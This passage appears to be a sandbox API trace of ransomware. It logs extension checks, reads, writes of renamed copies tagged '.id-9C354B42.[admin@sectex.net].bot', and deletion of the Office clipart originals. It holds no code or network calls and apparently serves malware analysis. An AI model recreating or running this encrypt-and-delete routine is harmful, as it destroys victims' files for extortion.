	[0141.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.622] lstrlenW (lpString=".zip") returned 4
	[0141.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.622] lstrlenW (lpString=".rar") returned 4
	[0141.622] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.622] lstrlenW (lpString=".bz2") returned 4
	[0141.622] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.622] lstrlenW (lpString=".7z") returned 3
	[0141.622] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.622] lstrlenW (lpString=".dbf") returned 4
	[0141.622] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.622] lstrlenW (lpString=".1cd") returned 4
	[0141.622] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.622] lstrlenW (lpString=".jpg") returned 4
	[0141.622] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.622] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.622] lstrlenW (lpString="BL00262_.WMF") returned 12
	[0141.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.630] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2556) returned 1
	[0141.630] CloseHandle (hObject=0x31c) returned 1
	[0141.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 0x20
	[0141.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0141.760] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.760] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.761] GetLastError () returned 0x0
	[0141.761] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x9fc, lpOverlapped=0x0) returned 1
	[0141.779] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xa00, lpOverlapped=0x0) returned 1
	[0141.794] ReadFile (in: hFile=0x398, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.794] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.794] SetEndOfFile (hFile=0x3c4) returned 1
	[0141.794] CloseHandle (hObject=0x3c4) returned 1
	[0141.794] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.794] SetEndOfFile (hFile=0x398) returned 1
	[0141.797] CloseHandle (hObject=0x398) returned 1
	[0141.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 1
	[0141.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.797] lstrlenW (lpString=".doc") returned 4
	[0141.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString=".docx") returned 5
	[0141.798] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.798] lstrlenW (lpString=".pdf") returned 4
	[0141.798] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString=".xls") returned 4
	[0141.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.798] lstrlenW (lpString=".xlsx") returned 5
	[0141.798] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.798] lstrlenW (lpString=".ppt") returned 4
	[0141.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString=".zip") returned 4
	[0141.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.798] lstrlenW (lpString=".rar") returned 4
	[0141.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString=".bz2") returned 4
	[0141.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString=".7z") returned 3
	[0141.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString=".dbf") returned 4
	[0141.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString=".1cd") returned 4
	[0141.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString=".jpg") returned 4
	[0141.798] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.798] lstrlenW (lpString=".doc") returned 4
	[0141.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.798] lstrlenW (lpString=".docx") returned 5
	[0141.799] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.799] lstrlenW (lpString=".pdf") returned 4
	[0141.799] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString=".xls") returned 4
	[0141.799] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.799] lstrlenW (lpString=".xlsx") returned 5
	[0141.799] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.799] lstrlenW (lpString=".ppt") returned 4
	[0141.799] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.799] lstrlenW (lpString=".zip") returned 4
	[0141.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.799] lstrlenW (lpString=".rar") returned 4
	[0141.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString=".bz2") returned 4
	[0141.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString=".7z") returned 3
	[0141.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.799] lstrlenW (lpString=".dbf") returned 4
	[0141.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.799] lstrlenW (lpString=".1cd") returned 4
	[0141.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63
	[0141.799] lstrlenW (lpString=".jpg") returned 4
	[0141.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.799] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.799] lstrlenW (lpString="BL00270_.WMF") returned 12
	[0141.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.803] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3016) returned 1
	[0141.803] CloseHandle (hObject=0x3a8) returned 1
	[0141.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 0x20
	[0141.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.804] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.804] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.808] GetLastError () returned 0x0
	[0141.808] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xbc8, lpOverlapped=0x0) returned 1
	[0141.816] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xbd0, lpOverlapped=0x0) returned 1
	[0141.816] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.816] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.817] SetEndOfFile (hFile=0x3c4) returned 1
	[0141.817] CloseHandle (hObject=0x3c4) returned 1
	[0141.817] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.817] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.819] CloseHandle (hObject=0x3a8) returned 1
	[0141.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 1
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString=".doc") returned 4
	[0141.820] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString=".docx") returned 5
	[0141.820] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.820] lstrlenW (lpString=".pdf") returned 4
	[0141.820] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString=".xls") returned 4
	[0141.820] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.820] lstrlenW (lpString=".xlsx") returned 5
	[0141.820] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.820] lstrlenW (lpString=".ppt") returned 4
	[0141.820] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString=".zip") returned 4
	[0141.820] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.820] lstrlenW (lpString=".rar") returned 4
	[0141.820] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString=".bz2") returned 4
	[0141.820] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString=".7z") returned 3
	[0141.820] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString=".dbf") returned 4
	[0141.820] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString=".1cd") returned 4
	[0141.820] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.820] lstrlenW (lpString=".jpg") returned 4
	[0141.820] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString=".doc") returned 4
	[0141.821] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString=".docx") returned 5
	[0141.821] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.821] lstrlenW (lpString=".pdf") returned 4
	[0141.821] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString=".xls") returned 4
	[0141.821] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.821] lstrlenW (lpString=".xlsx") returned 5
	[0141.821] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.821] lstrlenW (lpString=".ppt") returned 4
	[0141.821] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString=".zip") returned 4
	[0141.821] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.821] lstrlenW (lpString=".rar") returned 4
	[0141.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString=".bz2") returned 4
	[0141.821] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString=".7z") returned 3
	[0141.821] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString=".dbf") returned 4
	[0141.821] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString=".1cd") returned 4
	[0141.821] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63
	[0141.821] lstrlenW (lpString=".jpg") returned 4
	[0141.821] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.822] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.822] lstrlenW (lpString="BL00273_.WMF") returned 12
	[0141.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.822] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3780) returned 1
	[0141.822] CloseHandle (hObject=0x3a8) returned 1
	[0141.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 0x20
	[0141.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.823] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.823] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.828] GetLastError () returned 0x0
	[0141.828] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xec4, lpOverlapped=0x0) returned 1
	[0141.838] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xed0, lpOverlapped=0x0) returned 1
	[0141.840] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.840] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.840] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.840] CloseHandle (hObject=0x3b4) returned 1
	[0141.841] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.841] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.843] CloseHandle (hObject=0x3a8) returned 1
	[0141.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.444] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 1
	[0142.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.446] lstrlenW (lpString=".doc") returned 4
	[0142.446] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.446] lstrlenW (lpString=".docx") returned 5
	[0142.446] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.446] lstrlenW (lpString=".pdf") returned 4
	[0142.446] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.446] lstrlenW (lpString=".xls") returned 4
	[0142.446] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.446] lstrlenW (lpString=".xlsx") returned 5
	[0142.446] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.446] lstrlenW (lpString=".ppt") returned 4
	[0142.446] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.446] lstrlenW (lpString=".zip") returned 4
	[0142.446] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.446] lstrlenW (lpString=".rar") returned 4
	[0142.447] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString=".bz2") returned 4
	[0142.447] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString=".7z") returned 3
	[0142.447] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString=".dbf") returned 4
	[0142.447] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString=".1cd") returned 4
	[0142.447] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString=".jpg") returned 4
	[0142.447] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString=".doc") returned 4
	[0142.447] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString=".docx") returned 5
	[0142.447] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.447] lstrlenW (lpString=".pdf") returned 4
	[0142.447] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString=".xls") returned 4
	[0142.447] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.447] lstrlenW (lpString=".xlsx") returned 5
	[0142.447] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.447] lstrlenW (lpString=".ppt") returned 4
	[0142.447] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.447] lstrlenW (lpString=".zip") returned 4
	[0142.447] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.447] lstrlenW (lpString=".rar") returned 4
